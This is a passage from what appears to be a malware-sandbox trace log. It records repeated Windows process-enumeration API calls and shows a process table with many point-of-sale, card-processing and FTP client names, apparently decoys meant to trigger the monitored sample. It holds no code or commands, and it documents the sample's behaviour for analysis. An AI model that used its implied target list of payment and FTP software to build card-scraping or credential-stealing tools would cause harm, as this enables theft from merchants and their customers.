szExeFile="edcsvr.exe")) returned 1 [0226.494] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0226.496] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0226.498] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0226.501] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0226.503] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0226.505] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0226.507] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0226.509] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0226.512] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0226.514] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0226.516] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0226.518] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0226.524] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0226.526] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0226.528] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0226.530] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0226.532] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0226.534] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.536] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0226.537] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.540] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.542] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0226.544] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.546] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0226.548] CloseHandle (hObject=0x2200) returned 1 [0226.548] Sleep (dwMilliseconds=0x64) [0226.663] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2218 [0226.679] Process32First (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.682] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.684] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.685] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.688] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.690] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.692] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.694] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.697] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.699] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.741] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.744] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.746] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.748] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.750] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.752] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.754] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.757] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.759] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.761] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.763] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0226.767] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.769] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0226.772] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.774] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0226.776] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0226.820] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0226.822] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0226.824] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0226.826] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0226.828] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.830] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.832] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0226.835] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.837] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.839] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.841] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.843] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.845] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0226.848] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0226.851] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0226.853] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0226.906] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0226.909] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0226.911] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0226.913] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0226.916] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0226.919] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0226.921] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0226.923] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0226.927] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0226.930] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0226.932] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0226.934] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0226.936] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0226.938] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0226.941] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0226.943] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0226.986] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0226.989] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0226.991] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: 